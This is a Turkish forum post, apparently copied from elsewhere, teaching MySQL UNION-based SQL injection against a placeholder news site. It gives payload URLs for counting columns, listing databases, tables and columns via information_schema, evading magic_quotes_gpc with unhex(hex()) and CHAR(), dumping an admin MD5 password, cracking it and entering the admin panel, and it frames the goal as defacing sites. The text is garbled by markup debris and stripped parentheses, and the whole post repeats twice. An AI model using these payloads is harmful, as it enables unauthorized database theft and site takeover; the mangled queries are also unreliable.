[FONT=Arial, Helvetica, sans-serif]Öncelikle merhaba bir öğretme azmi geldi bir döküman yazayımda arkdaşlarımla paylaşıyım dedim neyse lafı fazla uzatmadan başlayalım.
Bu dökümanımda sizlere mysql injection detaylarını göstericem inebildiğim kadarıyla .
Öncelikle bilmenizi isterim ki mysql injection olayında update yoktur sadece verileri okuyabilirsiniz örneğin admin id pass alırsınız panele girer basarsınız mesela.[/FONT]
[FONT=Arial, Helvetica, sans-serif]Örnek Site :
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8[FONT=Arial, Helvetica, sans-serif]
Şimdi hata verdirmeye çalışalım.
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8[FONT=Arial, Helvetica, sans-serif]’ yaptık.
Böyle bir haber kaydı bulunamadı. diyor (mesela)
Site sonuna
and 1=0 eklersek hata vermesi
and 1=1 eklersek normal açılması lazım.
Yapıyoruz..
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8[FONT=Arial, Helvetica, sans-serif] and 1=0 hata verdi
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8[FONT=Arial, Helvetica, sans-serif] and 1=1 normal açıldı
Başlıyoruz öncelikle kolon sayısını bulmamız lazım bunun için.
Order+by kullanıcaz ama nasıl ?
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8+order+by+1[FONT=Arial, Helvetica, sans-serif] gibi
Bişey yok sonuna "--" ekliyoruz .
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8+order+by+1--[FONT=Arial, Helvetica, sans-serif] yapıyoruz sayfa normal açıldı bir problem yok.
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8+order+by+2--[FONT=Arial, Helvetica, sans-serif] yapıyoruz hata verdi.
Bundan şu sonucu çıkartıyoruz colon sayısı 1 şimdi işe koyuluyoruz.
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8+union+select+1--[FONT=Arial, Helvetica, sans-serif] bakın -- unutmayalım.
Birşey yok neden yok haber.php?id= den sonra - koymadım şöle.
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=[FONT=Arial, Helvetica, sans-serif]-8+union+select+1--
Evet 1 ekrana vurdu.Aşama aşama devam edelim ..
1.DataBase adlarını çekelim.
Bunun için ekrana vuran sayının yerine
group_concat(schema_name)
yazıyoruz ve en sonra +from+information_schmea.schemata yazıyoruz şöle.[/FONT]
color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+group_concatschema_name+from+information_schmea.schemata[FONT=Arial, Helvetica, sans-serif]--[/FONT]
[FONT=Arial, Helvetica, sans-serif]Birşey vurmadı yaptığımız işden de eminiz sorun ne ?
Sorun magic_quotes_gpc peki napıcaz ?
Unhex(hex()) metodunu uyguluyacaz ve
sayının yerine yazdığımız group_concat(schema_name) i
unhex(hex(group_concat(schema_name))) yapıcaz
deniyelim.[/FONT]
h color=#0000cc ttp://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concatschema_name+from+information_schema.schemata[FONT=Arial, Helvetica, sans-serif]--[/FONT]
[FONT=Arial, Helvetica, sans-serif]evet
Tablo adlarını öğreneceğiz
gene aynı yerden bu sefer grop_concat(schema_name) i [/FONT][FONT=Arial, Helvetica, sans-serif]group_concat(table_name)
olarak değiştiriyoruz yani şöle.[/FONT]
color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concattable_name[FONT=Arial, Helvetica, sans-serif])))[/FONT]
[FONT=Arial, Helvetica, sans-serif]sonunada
+from+information_schema.tables yazıyoruz ve tam olarak[/FONT]
color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concattable_name+from+information_schema.tables[FONT=Arial, Helvetica, sans-serif]-- oldu[/FONT]
[FONT=Arial, Helvetica, sans-serif]sonunda -- unutmayalım .
evet tablolar geldi ama alakasız tabloalr geldi napcaz.
sonunda +where+table_name=database() ekliyicez
sonuç ;[/FONT]
color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concattable_name+from+information_schema.tables+where+table_name=database[FONT=Arial, Helvetica, sans-serif]()[/FONT]
[FONT=Arial, Helvetica, sans-serif]evet tablolar ekrana yansıdı
Bir tablo adı seçiyoruz örneğin admin var diyelim
hemen adminin kolonlarını çekicez
gene aynı bu sefer aynı yeri group_concat(column_name) oarlak değiştirip sonuna
[/FONT][FONT=Arial, Helvetica, sans-serif]+from+information_schema.columns+where+table_name= CHAR(97, 100, 109, 105, 110, 108, 101, 114)--
ekliyoruz olmadı ?
Neden magic_quates_gpc açık napıcaz adminler i charlıcaz yani ?
adminler=CHAR(97, 100, 109, 105, 110, 108, 101, 114) bu olucak nasıl mysql char haline getirirsiniz ? firefox hackarbar eklentisi bunu yapabilir en basitinden
evet şimdi url böle oldu[/FONT]
color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concatcolounm_name+from+information_schema.columns+where+table_name=CHAR97[FONT=Arial, Helvetica, sans-serif], 100, 109, 105, 110, 108, 101, 114)--[/FONT]
[FONT=Arial, Helvetica, sans-serif]evet geldi ekrana neymiş
kad ve sifre kolonları varmış şimdi onlardaki verileri çekelim [/FONT]
color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+group_concatkad,0x3a,sifre+from+adminler[FONT=Arial, Helvetica, sans-serif]-- yapıyoruz[/FONT]
[FONT=Arial, Helvetica, sans-serif]buradaki 0x3a ";" hex halidir şaşırtmasın
evet ekrana geldi
kullanıcı adı admin sifre md5 halde
admin:21232f297a57a5a743894a0e4a801fc3:
şimdi bunu herhangi bi şekilde kırıyoruz şifre "admin" miş
panele girip login oluyoruz ordan gerisi sizin fanteziniz ne yaparsanız yapın.[/FONT]
[FONT=Arial, Helvetica, sans-serif]Selametle arkadaşlar..[/FONT]
Alıntıdır.
[FONT=Arial, Helvetica, sans-serif][/FONT]
Bu dökümanımda sizlere mysql injection detaylarını göstericem inebildiğim kadarıyla .
Öncelikle bilmenizi isterim ki mysql injection olayında update yoktur sadece verileri okuyabilirsiniz örneğin admin id pass alırsınız panele girer basarsınız mesela.[/FONT]
[FONT=Arial, Helvetica, sans-serif]Örnek Site :
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8[FONT=Arial, Helvetica, sans-serif]
Şimdi hata verdirmeye çalışalım.
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8[FONT=Arial, Helvetica, sans-serif]’ yaptık.
Böyle bir haber kaydı bulunamadı. diyor (mesela)
Site sonuna
and 1=0 eklersek hata vermesi
and 1=1 eklersek normal açılması lazım.
Yapıyoruz..
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8[FONT=Arial, Helvetica, sans-serif] and 1=0 hata verdi
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8[FONT=Arial, Helvetica, sans-serif] and 1=1 normal açıldı
Başlıyoruz öncelikle kolon sayısını bulmamız lazım bunun için.
Order+by kullanıcaz ama nasıl ?
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8+order+by+1[FONT=Arial, Helvetica, sans-serif] gibi
Bişey yok sonuna "--" ekliyoruz .
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8+order+by+1--[FONT=Arial, Helvetica, sans-serif] yapıyoruz sayfa normal açıldı bir problem yok.
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8+order+by+2--[FONT=Arial, Helvetica, sans-serif] yapıyoruz hata verdi.
Bundan şu sonucu çıkartıyoruz colon sayısı 1 şimdi işe koyuluyoruz.
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=8+union+select+1--[FONT=Arial, Helvetica, sans-serif] bakın -- unutmayalım.
Birşey yok neden yok haber.php?id= den sonra - koymadım şöle.
[/FONT] color=#0000cc http://www.sitemiz.com/haber.php?id=[FONT=Arial, Helvetica, sans-serif]-8+union+select+1--
Evet 1 ekrana vurdu.Aşama aşama devam edelim ..
1.DataBase adlarını çekelim.
Bunun için ekrana vuran sayının yerine
group_concat(schema_name)
yazıyoruz ve en sonra +from+information_schmea.schemata yazıyoruz şöle.[/FONT]
color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+group_concatschema_name+from+information_schmea.schemata[FONT=Arial, Helvetica, sans-serif]--[/FONT]
[FONT=Arial, Helvetica, sans-serif]Birşey vurmadı yaptığımız işden de eminiz sorun ne ?
Sorun magic_quotes_gpc peki napıcaz ?
Unhex(hex()) metodunu uyguluyacaz ve
sayının yerine yazdığımız group_concat(schema_name) i
unhex(hex(group_concat(schema_name))) yapıcaz
deniyelim.[/FONT]
h color=#0000cc ttp://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concatschema_name+from+information_schema.schemata[FONT=Arial, Helvetica, sans-serif]--[/FONT]
[FONT=Arial, Helvetica, sans-serif]evet
Tablo adlarını öğreneceğiz
gene aynı yerden bu sefer grop_concat(schema_name) i [/FONT][FONT=Arial, Helvetica, sans-serif]group_concat(table_name)
olarak değiştiriyoruz yani şöle.[/FONT]
color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concattable_name[FONT=Arial, Helvetica, sans-serif])))[/FONT]
[FONT=Arial, Helvetica, sans-serif]sonunada
+from+information_schema.tables yazıyoruz ve tam olarak[/FONT]
color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concattable_name+from+information_schema.tables[FONT=Arial, Helvetica, sans-serif]-- oldu[/FONT]
[FONT=Arial, Helvetica, sans-serif]sonunda -- unutmayalım .
evet tablolar geldi ama alakasız tabloalr geldi napcaz.
sonunda +where+table_name=database() ekliyicez
sonuç ;[/FONT]
color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concattable_name+from+information_schema.tables+where+table_name=database[FONT=Arial, Helvetica, sans-serif]()[/FONT]
[FONT=Arial, Helvetica, sans-serif]evet tablolar ekrana yansıdı
Bir tablo adı seçiyoruz örneğin admin var diyelim
hemen adminin kolonlarını çekicez
gene aynı bu sefer aynı yeri group_concat(column_name) oarlak değiştirip sonuna
[/FONT][FONT=Arial, Helvetica, sans-serif]+from+information_schema.columns+where+table_name= CHAR(97, 100, 109, 105, 110, 108, 101, 114)--
ekliyoruz olmadı ?
Neden magic_quates_gpc açık napıcaz adminler i charlıcaz yani ?
adminler=CHAR(97, 100, 109, 105, 110, 108, 101, 114) bu olucak nasıl mysql char haline getirirsiniz ? firefox hackarbar eklentisi bunu yapabilir en basitinden
evet şimdi url böle oldu[/FONT]
color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concatcolounm_name+from+information_schema.columns+where+table_name=CHAR97[FONT=Arial, Helvetica, sans-serif], 100, 109, 105, 110, 108, 101, 114)--[/FONT]
[FONT=Arial, Helvetica, sans-serif]evet geldi ekrana neymiş
kad ve sifre kolonları varmış şimdi onlardaki verileri çekelim [/FONT]
color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+group_concatkad,0x3a,sifre+from+adminler[FONT=Arial, Helvetica, sans-serif]-- yapıyoruz[/FONT]
[FONT=Arial, Helvetica, sans-serif]buradaki 0x3a ";" hex halidir şaşırtmasın
evet ekrana geldi
kullanıcı adı admin sifre md5 halde
admin:21232f297a57a5a743894a0e4a801fc3:
şimdi bunu herhangi bi şekilde kırıyoruz şifre "admin" miş
panele girip login oluyoruz ordan gerisi sizin fanteziniz ne yaparsanız yapın.[/FONT]
[FONT=Arial, Helvetica, sans-serif]Selametle arkadaşlar..[/FONT]
Alıntıdır.
[FONT=Arial, Helvetica, sans-serif][/FONT]